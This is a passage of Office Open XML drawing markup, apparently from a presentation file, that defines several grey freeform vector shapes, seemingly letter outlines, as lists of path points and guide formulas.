                  <a:gd name="T68" fmla="*/ 45 w 355"/>
                  <a:gd name="T69" fmla="*/ 364 h 434"/>
                  <a:gd name="T70" fmla="*/ 56 w 355"/>
                  <a:gd name="T71" fmla="*/ 383 h 434"/>
                  <a:gd name="T72" fmla="*/ 82 w 355"/>
                  <a:gd name="T73" fmla="*/ 391 h 434"/>
                  <a:gd name="T74" fmla="*/ 126 w 355"/>
                  <a:gd name="T75" fmla="*/ 391 h 434"/>
                  <a:gd name="T76" fmla="*/ 182 w 355"/>
                  <a:gd name="T77" fmla="*/ 389 h 434"/>
                  <a:gd name="T78" fmla="*/ 218 w 355"/>
                  <a:gd name="T79" fmla="*/ 376 h 434"/>
                  <a:gd name="T80" fmla="*/ 242 w 355"/>
                  <a:gd name="T81" fmla="*/ 339 h 434"/>
                  <a:gd name="T82" fmla="*/ 258 w 355"/>
                  <a:gd name="T83" fmla="*/ 285 h 434"/>
                  <a:gd name="T84" fmla="*/ 258 w 355"/>
                  <a:gd name="T85" fmla="*/ 254 h 434"/>
                  <a:gd name="T86" fmla="*/ 242 w 355"/>
                  <a:gd name="T87" fmla="*/ 239 h 434"/>
                  <a:gd name="T88" fmla="*/ 214 w 355"/>
                  <a:gd name="T89" fmla="*/ 235 h 434"/>
                  <a:gd name="T90" fmla="*/ 174 w 355"/>
                  <a:gd name="T91" fmla="*/ 232 h 434"/>
                  <a:gd name="T92" fmla="*/ 136 w 355"/>
                  <a:gd name="T93" fmla="*/ 229 h 434"/>
                  <a:gd name="T94" fmla="*/ 103 w 355"/>
                  <a:gd name="T95" fmla="*/ 224 h 434"/>
                  <a:gd name="T96" fmla="*/ 76 w 355"/>
                  <a:gd name="T97" fmla="*/ 212 h 434"/>
                  <a:gd name="T98" fmla="*/ 61 w 355"/>
                  <a:gd name="T99" fmla="*/ 190 h 434"/>
                  <a:gd name="T100" fmla="*/ 61 w 355"/>
                  <a:gd name="T101" fmla="*/ 150 h 434"/>
                  <a:gd name="T102" fmla="*/ 81 w 355"/>
                  <a:gd name="T103" fmla="*/ 84 h 434"/>
                  <a:gd name="T104" fmla="*/ 111 w 355"/>
                  <a:gd name="T105" fmla="*/ 34 h 434"/>
                  <a:gd name="T106" fmla="*/ 152 w 355"/>
                  <a:gd name="T107" fmla="*/ 8 h 434"/>
                  <a:gd name="T108" fmla="*/ 208 w 355"/>
                  <a:gd name="T109" fmla="*/ 1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5" h="434">
                    <a:moveTo>
                      <a:pt x="243" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="264" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="9292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5" name="Freeform 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2144C217-51EE-0845-B9B8-ABB77C45A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1225" y="1116013"/>
                <a:ext cx="187325" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 112 w 354"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 354 w 354"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 342 w 354"/>
                  <a:gd name="T5" fmla="*/ 42 h 426"/>
                  <a:gd name="T6" fmla="*/ 144 w 354"/>
                  <a:gd name="T7" fmla="*/ 42 h 426"/>
                  <a:gd name="T8" fmla="*/ 107 w 354"/>
                  <a:gd name="T9" fmla="*/ 186 h 426"/>
                  <a:gd name="T10" fmla="*/ 301 w 354"/>
                  <a:gd name="T11" fmla="*/ 186 h 426"/>
                  <a:gd name="T12" fmla="*/ 291 w 354"/>
                  <a:gd name="T13" fmla="*/ 225 h 426"/>
                  <a:gd name="T14" fmla="*/ 97 w 354"/>
                  <a:gd name="T15" fmla="*/ 225 h 426"/>
                  <a:gd name="T16" fmla="*/ 56 w 354"/>
                  <a:gd name="T17" fmla="*/ 384 h 426"/>
                  <a:gd name="T18" fmla="*/ 254 w 354"/>
                  <a:gd name="T19" fmla="*/ 384 h 426"/>
                  <a:gd name="T20" fmla="*/ 242 w 354"/>
                  <a:gd name="T21" fmla="*/ 426 h 426"/>
                  <a:gd name="T22" fmla="*/ 0 w 354"/>
                  <a:gd name="T23" fmla="*/ 426 h 426"/>
                  <a:gd name="T24" fmla="*/ 112 w 354"/>
                  <a:gd name="T25" fmla="*/ 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4" h="426">
                    <a:moveTo>
                      <a:pt x="112" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="354" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42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9292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6" name="Freeform 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3525804B-69CA-4440-AC81-6DA748D3E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0950" y="1116013"/>
                <a:ext cx="204788" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 88 w 386"/>
                  <a:gd name="T1" fmla="*/ 0 h 430"/>
                  <a:gd name="T2" fmla="*/ 130 w 386"/>
                  <a:gd name="T3" fmla="*/ 0 h 430"/>
                  <a:gd name="T4" fmla="*/ 50 w 386"/>
                  <a:gd name="T5" fmla="*/ 308 h 430"/>
                  <a:gd name="T6" fmla="*/ 44 w 386"/>
                  <a:gd name="T7" fmla="*/ 333 h 430"/>
                  <a:gd name="T8" fmla="*/ 44 w 386"/>
                  <a:gd name="T9" fmla="*/ 354 h 430"/>
                  <a:gd name="T10" fmla="*/ 47 w 386"/>
                  <a:gd name="T11" fmla="*/ 368 h 430"/>
                  <a:gd name="T12" fmla="*/ 58 w 386"/>
                  <a:gd name="T13" fmla="*/ 378 h 430"/>
                  <a:gd name="T14" fmla="*/ 76 w 386"/>
                  <a:gd name="T15" fmla="*/ 384 h 430"/>
                  <a:gd name="T16" fmla="*/ 101 w 386"/>
                  <a:gd name="T17" fmla="*/ 387 h 430"/>
                  <a:gd name="T18" fmla="*/ 136 w 386"/>
                  <a:gd name="T19" fmla="*/ 387 h 430"/>
                  <a:gd name="T20" fmla="*/ 166 w 386"/>
                  <a:gd name="T21" fmla="*/ 387 h 430"/>
                  <a:gd name="T22" fmla="*/ 191 w 386"/>
                  <a:gd name="T23" fmla="*/ 384 h 430"/>
                  <a:gd name="T24" fmla="*/ 213 w 386"/>
                  <a:gd name="T25" fmla="*/ 378 h 430"/>
                  <a:gd name="T26" fmla="*/ 229 w 386"/>
                  <a:gd name="T27" fmla="*/ 368 h 430"/>
                  <a:gd name="T28" fmla="*/ 243 w 386"/>
                  <a:gd name="T29" fmla="*/ 354 h 430"/>
                  <a:gd name="T30" fmla="*/ 254 w 386"/>
                  <a:gd name="T31" fmla="*/ 333 h 430"/>
                  <a:gd name="T32" fmla="*/ 262 w 386"/>
                  <a:gd name="T33" fmla="*/ 308 h 430"/>
                  <a:gd name="T34" fmla="*/ 343 w 386"/>
                  <a:gd name="T35" fmla="*/ 0 h 430"/>
                  <a:gd name="T36" fmla="*/ 386 w 386"/>
                  <a:gd name="T37" fmla="*/ 0 h 430"/>
                  <a:gd name="T38" fmla="*/ 305 w 386"/>
                  <a:gd name="T39" fmla="*/ 308 h 430"/>
                  <a:gd name="T40" fmla="*/ 295 w 386"/>
                  <a:gd name="T41" fmla="*/ 344 h 430"/>
                  <a:gd name="T42" fmla="*/ 280 w 386"/>
                  <a:gd name="T43" fmla="*/ 370 h 430"/>
                  <a:gd name="T44" fmla="*/ 265 w 386"/>
                  <a:gd name="T45" fmla="*/ 391 h 430"/>
                  <a:gd name="T46" fmla="*/ 246 w 386"/>
                  <a:gd name="T47" fmla="*/ 408 h 430"/>
                  <a:gd name="T48" fmla="*/ 227 w 386"/>
                  <a:gd name="T49" fmla="*/ 418 h 430"/>
                  <a:gd name="T50" fmla="*/ 204 w 386"/>
                  <a:gd name="T51" fmla="*/ 424 h 430"/>
                  <a:gd name="T52" fmla="*/ 180 w 386"/>
                  <a:gd name="T53" fmla="*/ 429 h 430"/>
                  <a:gd name="T54" fmla="*/ 154 w 386"/>
                  <a:gd name="T55" fmla="*/ 430 h 430"/>
                  <a:gd name="T56" fmla="*/ 125 w 386"/>
                  <a:gd name="T57" fmla="*/ 430 h 430"/>
                  <a:gd name="T58" fmla="*/ 103 w 386"/>
                  <a:gd name="T59" fmla="*/ 430 h 430"/>
                  <a:gd name="T60" fmla="*/ 82 w 386"/>
                  <a:gd name="T61" fmla="*/ 429 h 430"/>
                  <a:gd name="T62" fmla="*/ 63 w 386"/>
                  <a:gd name="T63" fmla="*/ 427 h 430"/>
                  <a:gd name="T64" fmla="*/ 45 w 386"/>
                  <a:gd name="T65" fmla="*/ 424 h 430"/>
                  <a:gd name="T66" fmla="*/ 31 w 386"/>
                  <a:gd name="T67" fmla="*/ 418 h 430"/>
                  <a:gd name="T68" fmla="*/ 17 w 386"/>
                  <a:gd name="T69" fmla="*/ 409 h 430"/>
                  <a:gd name="T70" fmla="*/ 9 w 386"/>
                  <a:gd name="T71" fmla="*/ 397 h 430"/>
                  <a:gd name="T72" fmla="*/ 3 w 386"/>
                  <a:gd name="T73" fmla="*/ 382 h 430"/>
                  <a:gd name="T74" fmla="*/ 0 w 386"/>
                  <a:gd name="T75" fmla="*/ 362 h 430"/>
                  <a:gd name="T76" fmla="*/ 1 w 386"/>
                  <a:gd name="T77" fmla="*/ 338 h 430"/>
                  <a:gd name="T78" fmla="*/ 7 w 386"/>
                  <a:gd name="T79" fmla="*/ 308 h 430"/>
                  <a:gd name="T80" fmla="*/ 88 w 386"/>
                  <a:gd name="T81" fmla="*/ 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6" h="430">
                    <a:moveTo>
                      <a:pt x="88" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="308"/>
                    </a:ln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9292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7" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05955D73-D573-C14D-A4F9-963682B208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1788" y="1116013"/>
                <a:ext cx="80963" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 112 w 154"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 154 w 154"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 43 w 154"/>
                  <a:gd name="T5" fmla="*/ 426 h 426"/>
                  <a:gd name="T6" fmla="*/ 0 w 154"/>
                  <a:gd name="T7" fmla="*/ 426 h 426"/>
                  <a:gd name="T8" fmla="*/ 112 w 154"/>
                  <a:gd name="T9" fmla="*/ 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426">
                    <a:moveTo>
                      <a:pt x="112" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42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9292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8" name="Freeform 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE1AD936-C006-E048-B743-1199E8BFD4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8625" y="1116013"/>
                <a:ext cx="155575" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 296"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 296 w 296"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 286 w 296"/>
                  <a:gd name="T5" fmla="*/ 42 h 426"/>
                  <a:gd name="T6" fmla="*/ 164 w 296"/>
                  <a:gd name="T7" fmla="*/ 42 h 426"/>
                  <a:gd name="T8" fmla="*/ 65 w 296"/>
                  <a:gd name="T9" fmla="*/ 426 h 426"/>
                  <a:gd name="T10" fmla="*/ 20 w 296"/>
                  <a:gd name="T11" fmla="*/ 426 h 426"/>
                  <a:gd name="T12" fmla="*/ 122 w 296"/>
                  <a:gd name="T13" fmla="*/ 42 h 426"/>
                  <a:gd name="T14" fmla="*/ 0 w 296"/>
                  <a:gd name="T15" fmla="*/ 42 h 426"/>
                  <a:gd name="T16" fmla="*/ 10 w 296"/>
                  <a:gd name="T17" fmla="*/ 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6" h="426">
                    <a:moveTo>
                      <a:pt x="10" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="296" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4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9292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69" name="Freeform 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23A448E-7130-884A-B069-3FD4544D20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4200" y="1116013"/>
                <a:ext cx="171450" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 323"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 50 w 323"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 113 w 323"/>
                  <a:gd name="T5" fmla="*/ 196 h 426"/>
                  <a:gd name="T6" fmla="*/ 271 w 323"/>
                  <a:gd name="T7" fmla="*/ 0 h 426"/>
                  <a:gd name="T8" fmla="*/ 323 w 323"/>
                  <a:gd name="T9" fmla="*/ 0 h 426"/>
                  <a:gd name="T10" fmla="*/ 122 w 323"/>
                  <a:gd name="T11" fmla="*/ 245 h 426"/>
                  <a:gd name="T12" fmla="*/ 75 w 323"/>
                  <a:gd name="T13" fmla="*/ 426 h 426"/>
                  <a:gd name="T14" fmla="*/ 32 w 323"/>
                  <a:gd name="T15" fmla="*/ 426 h 426"/>
                  <a:gd name="T16" fmla="*/ 79 w 323"/>
                  <a:gd name="T17" fmla="*/ 245 h 426"/>
                  <a:gd name="T18" fmla="*/ 0 w 323"/>
                  <a:gd name="T19" fmla="*/ 0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3" h="426">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="24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92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0" name="Freeform 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0261F7EB-C2C4-2740-A3BF-05B7D59C6F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3150" y="1112838"/>
                <a:ext cx="187325" cy="230188"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 242 w 354"/>
                  <a:gd name="T1" fmla="*/ 0 h 434"/>
                  <a:gd name="T2" fmla="*/ 273 w 354"/>
                  <a:gd name="T3" fmla="*/ 1 h 434"/>
                  <a:gd name="T4" fmla="*/ 304 w 354"/>
                  <a:gd name="T5" fmla="*/ 5 h 434"/>
                  <a:gd name="T6" fmla="*/ 332 w 354"/>
                  <a:gd name="T7" fmla="*/ 19 h 434"/>
                  <a:gd name="T8" fmla="*/ 349 w 354"/>
                  <a:gd name="T9" fmla="*/ 46 h 434"/>
                  <a:gd name="T10" fmla="*/ 352 w 354"/>
                  <a:gd name="T11" fmla="*/ 89 h 434"/>
                  <a:gd name="T12" fmla="*/ 304 w 354"/>
                  <a:gd name="T13" fmla="*/ 119 h 434"/>
                  <a:gd name="T14" fmla="*/ 310 w 354"/>
                  <a:gd name="T15" fmla="*/ 74 h 434"/>
                  <a:gd name="T16" fmla="*/ 295 w 354"/>
                  <a:gd name="T17" fmla="*/ 50 h 434"/>
                  <a:gd name="T18" fmla="*/ 257 w 354"/>
                  <a:gd name="T19" fmla="*/ 41 h 434"/>
                  <a:gd name="T20" fmla="*/ 198 w 354"/>
                  <a:gd name="T21" fmla="*/ 43 h 434"/>
